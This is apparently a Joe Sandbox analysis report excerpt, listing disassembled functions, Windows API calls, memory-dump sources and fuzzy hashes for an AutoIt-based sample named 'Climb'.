                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: c269a1951d6db80144ef9b2c09e0716aab183b9ee60f3138bf5e174a061723b2
                                                                                                                                                                      • Instruction ID: a7f1f029190def3f14aaf4cfd199ae2ef099c524a33f92b3a35b804c04bf7263
                                                                                                                                                                      • Opcode Fuzzy Hash: c269a1951d6db80144ef9b2c09e0716aab183b9ee60f3138bf5e174a061723b2
                                                                                                                                                                      • Instruction Fuzzy Hash: AAC1DFB090426AAFDF11EFA8E845BADBFB0BF5A310F140459E815A73D2C7309D42CB61

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1777 4f35b3-4f3623 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 004F35E1
                                                                                                                                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 004F3602
                                                                                                                                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,004F3368,?), ref: 004F3616
                                                                                                                                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,004F3368,?), ref: 004F361F
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$CreateShow
                                                                                                                                                                      • String ID: AutoIt v3$edit
                                                                                                                                                                      • API String ID: 1584632944-3779509399
                                                                                                                                                                      • Opcode ID: ed58d212741a37adfa977babd5a05561b01dd47ed09b642ea2cbc95054499d3a
                                                                                                                                                                      • Instruction ID: 40f8e049980bcfbbb3b326e329f3d0e56f4884d4e4506f4b31c4d01e0f35990f
                                                                                                                                                                      • Opcode Fuzzy Hash: ed58d212741a37adfa977babd5a05561b01dd47ed09b642ea2cbc95054499d3a
                                                                                                                                                                      • Instruction Fuzzy Hash: 23F0B7716406D47EEB2157176C48E372FBDE7D6F50F10042EBD04A61A0D6691859EAB0

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00535287
                                                                                                                                                                        • Part of subcall function 004F8577: _wcslen.LIBCMT ref: 004F858A
                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 004F6299
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                                                      • String ID: Line %d: $AutoIt -
                                                                                                                                                                      • API String ID: 2289894680-4094128768
                                                                                                                                                                      • Opcode ID: 72fe14ba340a939e0a6c1701df76b53244b27a4882f61f639edd53bf73ed0bc8
                                                                                                                                                                      • Instruction ID: 22d3cf6d03280a7c8eb8773d2eb6867bb9cfa2ed136d6304a0ff866c7fad9395
                                                                                                                                                                      • Opcode Fuzzy Hash: 72fe14ba340a939e0a6c1701df76b53244b27a4882f61f639edd53bf73ed0bc8
                                                                                                                                                                      • Instruction Fuzzy Hash: 4D41B4714083086EC310EB21DC45EEF7BE8AF95714F014A1FFA85920A2EF789649C796

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1829 528a2e-528a42 call 525737 1832 528a44-528a46 1829->1832 1833 528a48-528a50 1829->1833 1834 528a96-528ab6 call 5256a6 1832->1834 1835 528a52-528a59 1833->1835 1836 528a5b-528a5e 1833->1836 1846 528ac4 1834->1846 1847 528ab8-528ac2 call 51f613 1834->1847 1835->1836 1838 528a66-528a7a call 525737 * 2 1835->1838 1839 528a60-528a64 1836->1839 1840 528a7c-528a8c call 525737 CloseHandle 1836->1840 1838->1832 1838->1840 1839->1838 1839->1840 1840->1832 1850 528a8e-528a94 GetLastError 1840->1850 1848 528ac6-528ac9 1846->1848 1847->1848 1850->1834
                                                                                                                                                                      APIs
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,?,OVS,0052894C,?,005B9CE8,0000000C,005289AB,?,OVS,?,0053564F), ref: 00528A84
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00528A8E
                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 00528AB9
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                      • String ID: OVS
                                                                                                                                                                      • API String ID: 2583163307-2584013171
                                                                                                                                                                      • Opcode ID: 169e51aa25083775c40cd1099d5cf3eab51bb2c7375364b185578952139f4e4e
                                                                                                                                                                      • Instruction ID: b68a22ff3c470726baf7ff4a083e2af25c3289973e254bde368959c4db8e1eb8
                                                                                                                                                                      • Opcode Fuzzy Hash: 169e51aa25083775c40cd1099d5cf3eab51bb2c7375364b185578952139f4e4e
                                                                                                                                                                      • Instruction Fuzzy Hash: 450108326075706BD62462B4B849B7E6F45BFD3774F29051AF9149B1D2EF3089805290
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,004F58BE,SwapMouseButtons,00000004,?), ref: 004F58EF
                                                                                                                                                                      • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,004F58BE,SwapMouseButtons,00000004,?), ref: 004F5910
                                                                                                                                                                      • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,004F58BE,SwapMouseButtons,00000004,?), ref: 004F5932
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                                                                      • String ID: Control Panel\Mouse
                                                                                                                                                                      • API String ID: 3677997916-824357125
                                                                                                                                                                      • Opcode ID: 0cb8ea43c49bbe705729e25b31cff357f8f1e1581ce4f8721d88ccd9b849a65e
                                                                                                                                                                      • Instruction ID: 3880e21041a53bf948fa270c6081768945678cad679b7ae3c8f4f55a8d32aef6
                                                                                                                                                                      • Opcode Fuzzy Hash: 0cb8ea43c49bbe705729e25b31cff357f8f1e1581ce4f8721d88ccd9b849a65e
                                                                                                                                                                      • Instruction Fuzzy Hash: B5115AB5510618FFDB258F64DC84DBF77BCEF01760B10941AEA01E7210E2759E45A768
                                                                                                                                                                      APIs
                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 00503006
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Init_thread_footer
                                                                                                                                                                      • String ID: CALL$bnU
                                                                                                                                                                      • API String ID: 1385522511-1101651840
                                                                                                                                                                      • Opcode ID: bdb05c7b32a0c6877172137bc4a22097a73e7e9573bf21578a9b5f7e018553be
                                                                                                                                                                      • Instruction ID: 1a4feedd3567ed830b064b1a52a1db446b69e83ef83a4ffa5bbbf4250733de5d
                                                                                                                                                                      • Opcode Fuzzy Hash: bdb05c7b32a0c6877172137bc4a22097a73e7e9573bf21578a9b5f7e018553be
                                                                                                                                                                      • Instruction Fuzzy Hash: 46229B706082069FD714DF14C888A6EBFF5BF98314F24895DF49A8B2A1D771ED85CB82
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetOpenFileNameW.COMDLG32(?), ref: 0053413B
                                                                                                                                                                        • Part of subcall function 004F5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004F55D1,?,?,00534B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 004F5871
                                                                                                                                                                        • Part of subcall function 004F3A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004F3A76
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                      • String ID: X$`u[
                                                                                                                                                                      • API String ID: 779396738-121079185
                                                                                                                                                                      • Opcode ID: 26244fe9272516d4573def714062b56c28e88f237c53dc4c52fcdfb4503563e0
                                                                                                                                                                      • Instruction ID: f71043b962ea6d761b68839a785fc0615513f896292d0e2b58aa48a0654ee763
                                                                                                                                                                      • Opcode Fuzzy Hash: 26244fe9272516d4573def714062b56c28e88f237c53dc4c52fcdfb4503563e0
                                                                                                                                                                      • Instruction Fuzzy Hash: 76219671A0025C9BDF01DF99C805BEE7FF8AF49314F00805AE545B7281DBF89A898F65
                                                                                                                                                                      APIs
                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 005109D8
                                                                                                                                                                        • Part of subcall function 00513614: RaiseException.KERNEL32(?,?,?,005109FA,?,00000000,?,?,?,?,?,?,005109FA,00000000,005B9758,00000000), ref: 00513674
                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 005109F5
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                      • String ID: Unknown exception
                                                                                                                                                                      • API String ID: 3476068407-410509341
                                                                                                                                                                      • Opcode ID: 316623c1d01d2eb329760e710c25e69b75cb839ae03143a79d6d69e12f674f01
                                                                                                                                                                      • Instruction ID: f37b716ab5a00c5f38ff6315a181cbf5b9616bfdc1da295dfd88128ba0f45977
                                                                                                                                                                      • Opcode Fuzzy Hash: 316623c1d01d2eb329760e710c25e69b75cb839ae03143a79d6d69e12f674f01
                                                                                                                                                                      • Instruction Fuzzy Hash: 92F0C83490020EB7BF00BAA4DC5A8DE7F6C7E41350B605520B914975D2FBB0E6D6C6D0
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00578D52
                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 00578D59
                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 00578F3A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 146820519-0
                                                                                                                                                                      • Opcode ID: 94ef7557f6be520d44a5d2d5951380de3ad762ec3a937eaf586f5603349a25c6
                                                                                                                                                                      • Instruction ID: 6aefdbf8b402ff8faa34bc77dd284bfbf8dbd4f848dc93f851b1cdad15b49aee
                                                                                                                                                                      • Opcode Fuzzy Hash: 94ef7557f6be520d44a5d2d5951380de3ad762ec3a937eaf586f5603349a25c6
                                                                                                                                                                      • Instruction Fuzzy Hash: 57127C71A083019FD714DF28C488B2ABBE5FF84318F14895DE9899B392CB35ED45CB92
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004F61A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 004F6299
                                                                                                                                                                      • KillTimer.USER32(?,00000001,?,?), ref: 0050FD36
                                                                                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0050FD45
                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0054FE33
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3500052701-0
                                                                                                                                                                      • Opcode ID: 4223e74397da5d96f1d099618586d5e05063e743ea8499155993bcda7a8498f3
                                                                                                                                                                      • Instruction ID: d781ad2087dafc9cd1ff0cf3282a1f24419bf08c5325562c3e89b6974e2d682b
                                                                                                                                                                      • Opcode Fuzzy Hash: 4223e74397da5d96f1d099618586d5e05063e743ea8499155993bcda7a8498f3
                                                                                                                                                                      • Instruction Fuzzy Hash: 75319871904754AFEB72CF248855BEABFFCBB12708F00089ED59A97142C7745A85CB51
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,005297BA,FF8BC369,00000000,00000002,00000000), ref: 00529744
                                                                                                                                                                      • GetLastError.KERNEL32(?,005297BA,FF8BC369,00000000,00000002,00000000,?,00525ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00516F41), ref: 0052974E
                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 00529755
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2336955059-0
                                                                                                                                                                      • Opcode ID: 043d0da6dcc206878fb0e2c5e9a5741abe41d708d139a0f0fca38b4aad577ccf
                                                                                                                                                                      • Instruction ID: 48ca895fe977dd7d922492cb6d905df2017f669ba892cebc68f1971fccdaab21
                                                                                                                                                                      • Opcode Fuzzy Hash: 043d0da6dcc206878fb0e2c5e9a5741abe41d708d139a0f0fca38b4aad577ccf
                                                                                                                                                                      • Instruction Fuzzy Hash: E101DD32620525ABCB159F99EC05CAE7F69FFC7330F280259FC11972D0EA719D5197A0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 16913b175d888af4901f6ff36d45d4cc0fbd831cbc87005bdb7f653099c46afe
                                                                                                                                                                      • Instruction ID: 55d253ea943eb3212a73e17747a1bbd3263c9d4430ff52e161ed7cbfb79015f8
                                                                                                                                                                      • Opcode Fuzzy Hash: 16913b175d888af4901f6ff36d45d4cc0fbd831cbc87005bdb7f653099c46afe
                                                                                                                                                                      • Instruction Fuzzy Hash: 2632DF30A00606EFDB10DF54C885BEEBBB4FF52318F148919E815AB291DB35ED84CB96
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseErrorHandleMode
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3953868439-0
                                                                                                                                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                      • Instruction ID: cf830085b27a47ad58e302580d7618d426e5c76e17f6dd2b70ae5ad3971f17a4
                                                                                                                                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                      • Instruction Fuzzy Hash: 6831E674A00105DFE718DF58D488AA9FBB5FF49300BA496A5E409CB292D7B2EDC1CBC0
                                                                                                                                                                      APIs
                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 004F3A3C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: IconNotifyShell_
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1144537725-0
                                                                                                                                                                      • Opcode ID: 56b5f7ba91c00e9e575d0b6710cca245c2fd68a28e4a96a9533f1a1c129eccf0
                                                                                                                                                                      • Instruction ID: bdcc766dfbae9a2bc12dcebbbe434247e6ad48bb39de0ad0b6d5cf12e1a3babc
                                                                                                                                                                      • Opcode Fuzzy Hash: 56b5f7ba91c00e9e575d0b6710cca245c2fd68a28e4a96a9533f1a1c129eccf0
                                                                                                                                                                      • Instruction Fuzzy Hash: 113193B06047058FD720DF25D884BA7BBF8FB58709F00092EEAD987351E7B5A948CB56
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsThemeActive.UXTHEME ref: 004F333D
                                                                                                                                                                        • Part of subcall function 004F32E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 004F32FB
                                                                                                                                                                        • Part of subcall function 004F32E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 004F3312
                                                                                                                                                                        • Part of subcall function 004F338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,004F3368,?), ref: 004F33BB
                                                                                                                                                                        • Part of subcall function 004F338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,004F3368,?), ref: 004F33CE
                                                                                                                                                                        • Part of subcall function 004F338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,005C2418,005C2400,?,?,?,?,?,?,004F3368,?), ref: 004F343A
                                                                                                                                                                        • Part of subcall function 004F338B: SetCurrentDirectoryW.KERNEL32(?,00000001,005C2418,?,?,?,?,?,?,?,004F3368,?), ref: 004F34BB
                                                                                                                                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 004F3377
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
